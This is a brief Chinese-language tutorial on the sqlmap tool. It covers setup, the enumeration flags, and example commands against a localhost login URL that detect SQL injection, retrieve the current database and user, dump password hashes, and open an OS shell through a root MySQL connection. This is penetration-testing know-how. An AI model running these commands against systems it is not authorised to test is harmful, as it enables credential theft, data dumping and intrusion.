sqlmap使用

1.python环境准备(官网2.7.15版本下载，环境变量配置)。

2.sqlmap下载(git下载，解压本地)。

3.使用的语句:

   https://github.com/sqlmapproject/sqlmap/wiki/Usage   命令详细参数地址

 --current-user      Retrieve DBMS current user
    --current-db        Retrieve DBMS current database
    --hostname          Retrieve DBMS server hostname
    --is-dba            Detect if the DBMS current user is DBA
    --users             Enumerate DBMS users
    --passwords         Enumerate DBMS users password hashes
    --privileges        Enumerate DBMS users privileges
    --roles             Enumerate DBMS users roles
    --dbs               Enumerate DBMS databases
    --tables            Enumerate DBMS database tables
    --columns           Enumerate DBMS database table columns
    --schema            Enumerate DBMS schema
    --count             Retrieve number of entries for table(s)
    --dump              Dump DBMS database table entries
    --dump-all          Dump all DBMS databases tables entries
    --search            Search column(s), table(s) and/or database name(s)
    --comments          Retrieve DBMS comments
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table(s) to enumerate
    -C COL              DBMS database table column(s) to enumerate
    -X EXCLUDECOL       DBMS database table column(s) to not enumerate
    -U USER             DBMS user to enumerate

 

3.1sql-inject检测：python sqlmap.py -u "http://localhost:8080/user/login?username=1" --batch

以上拿到username是injection point;

3.2 数据库信息相关

python sqlmap.py -u "http://localhost:8080/user/login?username=1" --batch --current-db

python sqlmap.py -u "http://localhost:8080/user/login?username=1" --batch --current-user

python sqlmap.py -u "http://localhost:8080/user/login?username=1" --batch --passwords

类似命令可以拿到数据库的信息，包括数据库、用户及密码、库名、表名、表字段等信息还可以dump数据。

4.通过数据库连接获取shell

E:\sqlmap>python sqlmap.py -d "mysql://root:root@localhost:3306/test" --os-shell

PS:sqlmap用到了第三方库“python-pymysql“，如没有安装报错提示：

[10:04:48] [CRITICAL] sqlmap requires 'python-pymysql' third-party library in or
der to directly connect to the DBMS 'MySQL'. You can download it from 'https://g
ithub.com/PyMySQL/PyMySQL'. Alternative is to use a package 'python-sqlalchemy'
with support for dialect 'mysql' installed

python-pymysql下载地址：https://github.com/PyMySQL/PyMySQL 

安装：python -m pip install PyMySQL